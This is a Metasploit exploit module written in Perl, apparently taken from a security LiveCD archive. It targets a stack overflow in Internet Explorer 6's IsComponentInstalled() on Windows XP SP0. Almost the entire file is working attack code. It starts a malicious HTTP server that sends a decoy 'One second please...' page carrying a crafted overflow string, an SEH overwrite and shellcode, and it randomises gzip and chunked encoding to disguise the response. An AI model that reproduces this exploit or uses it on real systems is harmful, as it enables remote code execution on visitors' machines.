home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / ie_iscomponentinstalled.pm < prev    next >
Text File  |  2006-06-30  |  5KB  |  227 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::ie_iscomponentinstalled;
  11.  
  12. use strict;
  13. use base "Msf::Exploit";
  14. use Pex::Text;
  15. use IO::Socket::INET;
  16. use IPC::Open3;
  17.  
  18. my $advanced =
  19.   {
  20.     'Gzip'       => [1, 'Enable gzip content encoding'],
  21.     'Chunked'    => [1, 'Enable chunked transfer encoding'],
  22.   };
  23.   
  24. my $info =
  25.   {
  26.     'Name'           => 'Windows XP SP0 IE 6.0 IsComponentInstalled() Overflow',
  27.     'Version'        => '$Revision: 1.3 $',
  28.     'Authors'        =>
  29.       [
  30.         'H D Moore <hdm [at] metasploit.com>',
  31.       ],
  32.  
  33.     'Description'    =>
  34.       Pex::Text::Freeform(qq{
  35.         This module exploits a stack overflow in Internet Explorer. This bug was
  36.         patched in Windows 2000 SP4 and Windows XP SP1 according to MSRC.
  37. }),
  38.  
  39.     'Arch'           => [ 'x86' ],
  40.     'OS'             => [ 'win32' ],
  41.     'Priv'           => 0,
  42.  
  43.     'AutoOpts'       => { 'EXITFUNC' => 'thread' },
  44.     'UserOpts'       =>
  45.       {
  46.         'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
  47.         'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
  48.       },
  49.  
  50.     'Payload'        =>
  51.       {
  52.         'Prepend'    => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",      
  53.         'Space'      => 512,
  54.         'BadChars'   => "\x00\x5c\x0a\x0d\x22",
  55.         'Keys'     => ['-bind'],
  56.       },
  57.     'Refs'           =>
  58.       [
  59.       ],
  60.  
  61.     'DefaultTarget'  => 0,
  62.     'Targets'        =>
  63.       [
  64.         [ 'Windows XP SP0 with Internet Explorer 6.0', 0x71ab8e4a, 0xffffffff ]
  65.       ],
  66.     
  67.     'Keys'           => [ 'ie' ],
  68.  
  69.     'DisclosureDate' => 'Feb 24 2006',
  70.   };
  71.  
  72. sub new {
  73.     my $class = shift;
  74.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  75.     return($self);
  76. }
  77.  
  78. sub Exploit
  79. {
  80.     my $self = shift;
  81.     my $server = IO::Socket::INET->new(
  82.         LocalHost => $self->GetVar('HTTPHOST'),
  83.         LocalPort => $self->GetVar('HTTPPORT'),
  84.         ReuseAddr => 1,
  85.         Listen    => 1,
  86.         Proto     => 'tcp'
  87.     );
  88.     my $client;
  89.  
  90.     # Did the listener create fail?
  91.     if (not defined($server)) {
  92.         $self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
  93.         return;
  94.     }
  95.  
  96.     my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
  97.         Pex::Utils::SourceIP('1.2.3.4') :
  98.         $self->GetVar('HTTPHOST');
  99.  
  100.     $self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
  101.  
  102.     while (defined($client = $server->accept())) {
  103.         $self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
  104.     }
  105.  
  106.     return;
  107. }
  108.  
  109. sub HandleHttpClient
  110. {
  111.     my $self = shift;
  112.     my $fd   = shift;
  113.  
  114.     # Set the remote host information
  115.     my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
  116.         
  117.  
  118.     # Read the HTTP command
  119.     my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
  120.     my $agent;
  121.     
  122.     # Read in the HTTP headers
  123.     while ((my $line = $fd->RecvLine(10))) {
  124.         
  125.         $line =~ s/^\s+|\s+$//g;
  126.         
  127.         my ($var, $val) = split(/\:/, $line, 2);
  128.  
  129.         # Break out if we reach the end of the headers
  130.         last if (not defined($var) or not defined($val));
  131.  
  132.         $agent = $val if $var =~ /User-Agent/i;
  133.     }
  134.     
  135.     $self->PrintLine("[*] Client connected from $rhost:$rport ($agent)");
  136.  
  137.     my $res = $fd->Send($self->BuildResponse($self->GenerateHTML()));
  138.  
  139.     $fd->Close();
  140. }
  141.  
  142. sub GenerateHTML {
  143.     my $self        = shift;
  144.     my $target      = $self->Targets->[$self->GetVar('TARGET')];
  145.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  146.     my $pattern     = Pex::Text::PatternCreate(8192);
  147.  
  148.     # Smash the return address with a bogus pointer
  149.     substr($pattern, 755, 4, pack('V',  $target->[2] ));
  150.  
  151.     # Handle the exception :-)
  152.     substr($pattern, 6443, 4, pack('V',  $target->[1] ));
  153.     substr($pattern, 6443-4, 2, "\xeb\x06");
  154.     substr($pattern, 6443+4, length($shellcode), $shellcode);
  155.  
  156.     my $data        = qq|
  157. <html>
  158. <head>
  159.     <title>One second please...</title>
  160.     <script>
  161.         function window.onload() {
  162.             oClientCaps.style.behavior = "url(#default#clientCaps)";
  163.             oClientCaps.isComponentInstalled("$pattern", "componentid");
  164.         }
  165.     </script>
  166. </head>
  167. <body id="oClientCaps">
  168. One second please...
  169. </body>
  170. </html>
  171. |;
  172.     return $data;
  173. }
  174.  
  175. sub BuildResponse {
  176.     my ($self, $content) = @_;
  177.  
  178.     my $response =
  179.       "HTTP/1.1 200 OK\r\n" .
  180.       "Content-Type: text/html\r\n";
  181.  
  182.     if ($self->GetVar('Gzip')) {
  183.         $response .= "Content-Encoding: gzip\r\n";
  184.         $content = $self->Gzip($content);
  185.     }
  186.     if ($self->GetVar('Chunked')) {
  187.         $response .= "Transfer-Encoding: chunked\r\n";
  188.         $content = $self->Chunk($content);
  189.     } else {
  190.         $response .= 'Content-Length: ' . length($content) . "\r\n" .
  191.           "Connection: close\r\n";
  192.     }
  193.  
  194.     $response .= "\r\n" . $content;
  195.  
  196.     return $response;
  197. }
  198.  
  199. sub Chunk {
  200.     my ($self, $content) = @_;
  201.  
  202.     my $chunked;
  203.     while (length($content)) {
  204.         my $chunk = substr($content, 0, int(rand(10) + 1), '');
  205.         $chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
  206.     }
  207.     $chunked .= "0\r\n\r\n";
  208.  
  209.     return $chunked;
  210. }
  211.  
  212. sub Gzip {
  213.     my $self = shift;
  214.     my $data = shift;
  215.     my $comp = int(rand(5))+5;
  216.  
  217.     my($wtr, $rdr, $err);
  218.  
  219.     my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
  220.     print $wtr $data;
  221.     close ($wtr);
  222.     local $/;
  223.  
  224.     return (<$rdr>);
  225. }
  226. 1;
  227.